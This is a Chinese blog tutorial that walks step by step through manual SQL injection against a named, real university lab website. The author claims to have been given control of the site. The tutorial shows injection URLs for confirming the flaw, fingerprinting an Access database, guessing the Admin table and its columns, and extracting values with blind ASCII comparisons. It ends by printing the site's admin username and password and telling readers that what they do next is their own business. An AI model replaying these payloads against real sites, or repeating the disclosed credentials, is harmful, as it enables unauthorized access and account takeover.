SQL注入实战教程

声明:

本网站是广大教院的实验教学中心平台,制作日期是7年前,且荒废已久,前些日子负责人将服务器空间托管于我,所以本人拥有对该网站信息的修改权。故,用此网站实践一下SQL注入的基本流程,不借助于任何工具实现SQL注入。各位看官看看即可,补充一下网站的知识,不要用之做违反当地法令的事情。

下面先附上两张效果图:
image

image

下面开始来进行实战环节,在主页看到一个实验论坛,是个突破口可以点进去看看。

image

然后随便找了个帖子点了进去
image

首先发个回帖,尝试下XXS跨站脚本攻击,发现没用。。
image
然后检测下看看有没有SQL注入漏洞,这种链接如
http://www.xxx.com/xxx.asp?id=YY
几年前的asp网站,基本上都有这种漏洞。

image

采用单引号法

在浏览器地址栏中的页面链接地址后面增加一个单引号,刷新

然后访问该链接地址,浏览器可能会返回类似于下面的错误提示信息:

Microsoft JET Database Engine 错误’80040e14’

字符串的语法错误在查询表达式’ID=YY’中。

/xxx.asp 行8

image
这样就说明了该网站可能存在SQL注入攻击的漏洞。

为什么说是可能存在而不是一定存在了?首先,不一定每台服务器的IIS都返回具体错误提示给客户端,如果程序中加了cint(参数)之类语句的话,SQL注入是不会成功的,但服务器同样会报错,具体提示信息为处理 URL 时服务器上出错。其次,部分对SQL注入有一点了解的程序员,认为只要把单引号过滤掉就安全了,这种情况不为少数,如果你用单引号测试,是测不到注入点的。

所以我们可以用第二种方法来确定它是否存在可注入点。

  • 第一步,链接后加 and 1 = 1,刷新,
    image
    image

发现页面没有变化

  • 第二步,链接后加 and 1 = 2,刷新,
    image
    image

出错提示,提示的是帖子找不到。即提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on error resume next)

恩,所以它就是可以注入的。

下面总结一下这个方法:
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11 and 1=1
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11 and 1=2

这就是经典的1=1、1=2测试法了,怎么判断呢?看看上面三个网址返回的结果就知道了:

可以注入的表现:

① 正常显示(这是必然的,不然就是程序有错误了)

② 正常显示,内容基本与①相同

③ 提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on error resume next)

不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。

下面,我们再来判断一下数据库

ASP的数据库基本上(99%)都是SQLServer或者Access,所以我们只要判断出它是哪一种就可以了

在确认可以注入的情况下,使用下面的语句:

http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l\_id=11&t\_id=11 and (select count(\*) from sysobjects)\>0
http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l\_id=11&t\_id=11 and (select count(\*) from msysobjects)\>0

如果数据库是SQLServer,那么第一个网址的页面与原页面http://www.mytest.com/showdetail.asp?id= 49是大致相同的;而第二个网址,由于找不到表msysobjects,会提示出错,就算程序有容错处理,页面也与原页面完全不同。

如果数据库用的是Access,那么情况就有所不同,第一个网址的页面与原页面完全不同;第二个网址,则视乎数据库设置是否允许读该系统表,一般来说是不允许的,所以与原网址也是完全不同。大多数情况下,用第一个网址就可以得知系统所用的数据库类型,第二个网址只作为开启IIS错误提示时的验证。

但是我们根本不需要用这种方法,在最初链接加引号的时候,我们已经知道它是Access数据库了

image

至此,判断SQL注入点已经结束。此论坛的确存在SQL注入点,数据库为Access

下面,我们就开始进行SQL注入

根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:

(A) ID=11 这类注入的参数是数字型,SQL语句原貌大致如下:

1
Select * from 表名 where 字段=11

注入的参数为ID=11 And [查询条件],即是生成语句:

1
Select * from 表名 where 字段=11 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:

1
Select * from 表名 where 字段=’连续剧’

注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:

1
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(C)搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:

1
Select * from 表名 where 字段like ’%关键字%’

注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:

1
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着,将查询条件替换成SQL语句,猜解表名,例如:

1
ID=11 And (Select Count(*) from Admin)>=0

image

运气真好

如果页面就与ID=11的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
image

上图结果,就说明admin是存在的。表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。

先猜一下username

说明username字段不存在
image
image

再猜admin
image
image

Admin表有字段admin。

同理,重复以上步骤,还猜出了有password。

最后,在表名和列名猜解成功后,再使用SQL语句,得出字段的值,下面介绍一种最常用的方法-Ascii逐字解码法,虽然这种方法速度很慢,但肯定是可行的方法。

我们举个例子,已知表Admin中存在admin字段,首先,我们取第一条记录,测试长度:

http://jyjssfzx.gzhu.edu.cn/bbs/topic.asp?l_id=11&t_id=11 and (select top 1 len(admin) from Admin)>0

先说明原理,如果top 1的admin长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,然后我继续测>3成立,>4不成立,就是len(admin)=4

下图就是>4时的界面,0~3都是正常显示,我就不截图了。
image

当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。

知道了长度后就可以开始猜解了

1
And (Select top 1 asc(mid(admin,n,1)) from admin)>100

n就是猜解的表名的第几位,最后的长度数字就是刚才猜解出来的列名长度了
And (Select top 1 asc(mid(admin,1,1)) from admin)>100
就是猜解user里内容的第一位的ASCII字符是不是大于100

正确的话,那么表示USER第一个字符的ASCII码大于100,那么就猜>120,返回错误就是介于100-120之间,然后再一步一步的缩少,最终得到正确字符XXX,然后用ASCII转换器吧这个转换成普通字符就可以了

然后就是第二位
And (Select top 1 asc(mid(admin,2,1)) from admin)>100
一直猜下去。

然后我就一步步测,测出来 第一位106,第二位97,第三位110,第四位101,转换成英文就是jane……

以上步骤再来一次,测得密码:123

综上,我们知道了,这个网站用的是Access数据库,然后数据库里面有个admin表,其表有两个字段,admin和password,其第一条记录是 jane,123。也就是说管理员账号是jane,密码123。

至此,管理员账号密码权限获取成功,你想做什么就是你的事情了。

比如说:
image

本次SQL注入到此结束,希望能给大家带来不一样的体验。